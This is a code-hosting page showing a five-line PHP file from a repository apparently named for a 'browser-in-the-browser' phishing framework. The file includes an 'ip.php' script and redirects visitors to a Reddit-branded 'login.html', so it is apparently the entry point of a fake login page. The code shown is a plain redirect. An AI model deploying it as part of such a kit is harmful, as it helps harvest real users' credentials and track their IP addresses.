Book a Demo!
Store
Features
Docs
Share
Support
News
About
Policies
Sign Up
Sign In
surya-dev-singh
Edit Copy
Star
1
GitHub Repository:
surya-dev-singh/BITB-framwork
Path:
blob/main/sites/reddit/index.php
5
0
0
views
1
<?php
2
include
'ip.php'
;
3
header
(
'Location: login.html'
)
;
4
exit
5
?>
6
7